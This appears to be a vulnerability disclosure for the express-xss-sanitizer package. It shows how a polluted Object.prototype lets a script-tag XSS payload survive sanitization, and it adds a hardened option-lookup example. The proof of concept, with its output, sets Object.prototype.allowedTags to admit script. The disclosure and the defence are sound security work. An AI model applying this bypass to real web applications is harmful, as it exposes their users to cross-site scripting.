Issue: express-xss-sanitizer doesn't sanitize XSS payloads properly when the client is already affected by prototype pollution.
Affected versions: v1.1.2 and earlier
Code -
// Refer to https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information
var expressXssSanitizer = require("express-xss-sanitizer");
var data = "<h1>Hi</h1><script>alert()</script>";
// Simulate an existing prototype-pollution condition: every object now inherits `allowedTags`
Object.prototype.allowedTags = ['script'];
// The empty options object has no own `allowedTags`, so the lookup falls through to the polluted prototype
data = expressXssSanitizer.sanitize(data, {});
console.log(data);
Output -
"\n\n⚠️ Your `allowedTags` option includes, `script`, which… option\nand ensure you are accounting for this risk.\n\n"
"Hi<script>alert()</script>"
For Live POC - https://runkit.com/embed/w306l6zfm7tu
Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information.
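As an added example (not code from this issue or from express-xss-sanitizer), the following contrasts an option lookup that walks the prototype chain with one that honours only the caller's own, validated property; the function names, the toy tag stripper and the default value are assumptions for illustration.

```javascript
// Added example, not code from the issue or from express-xss-sanitizer:
// resolving a sanitizer's options without trusting properties inherited
// from Object.prototype. Function and option names are hypothetical.

const DEFAULT_ALLOWED_TAGS = Object.freeze([]); // default: strip every tag

// Naive lookup: `options.allowedTags` walks the prototype chain, so a
// polluted Object.prototype silently supplies the value.
function naiveAllowedTags(options) {
  return options.allowedTags || DEFAULT_ALLOWED_TAGS;
}

// Hardened lookup: honour only the caller's own property (Object.hasOwn,
// Node 16.9+), validate its shape, and otherwise fall back to the default.
function hardenedAllowedTags(options) {
  const src = options == null ? {} : options;
  if (!Object.hasOwn(src, "allowedTags")) {
    return DEFAULT_ALLOWED_TAGS;
  }
  const tags = src.allowedTags;
  if (!Array.isArray(tags) || !tags.every((t) => typeof t === "string")) {
    throw new TypeError("allowedTags must be an array of strings");
  }
  return tags.map((t) => t.toLowerCase());
}

// Toy tag stripper used only to make the effect visible; it is not a
// real HTML sanitizer and must not be used as one.
function stripDisallowedTags(html, allowedTags) {
  return html.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g, (tag, name) =>
    allowedTags.includes(name.toLowerCase()) ? tag : "");
}

// Pollute Object.prototype for the duration of fn, mirroring the issue's
// `Object.prototype.allowedTags = ['script']`, then clean up.
function withPollutedPrototype(fn) {
  Object.prototype.allowedTags = ["script"];
  try { return fn(); } finally { delete Object.prototype.allowedTags; }
}

// Same input as the issue; the caller passes an empty options object.
function demo(html = "<h1>Hi</h1><script>alert()</script>") {
  return withPollutedPrototype(() => ({
    naive: stripDisallowedTags(html, naiveAllowedTags({})),
    hardened: stripDisallowedTags(html, hardenedAllowedTags({})),
  }));
}

console.log(demo()); // naive keeps <script>, hardened strips it
```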